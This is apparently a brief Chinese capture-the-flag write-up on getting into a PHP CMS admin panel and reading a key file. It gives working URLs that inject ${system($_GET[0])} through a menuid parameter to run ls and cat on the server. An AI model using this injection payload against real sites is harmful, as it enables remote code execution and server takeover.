御剑扫描发现后台登录地址 admin.php
登录后台http://ip地址/admin.php
后台用户名密码自动补充
界面 > 模板管理 > 模板风格 >search >index.html
登入后台,直接URL上执行
http://ip地址/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
可以查看到key的名称
执行
```
http://ip地址/index.php?0=cat%20key_XXXX.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
```
查看网页源文件,可以查看到key的内容。
网友评论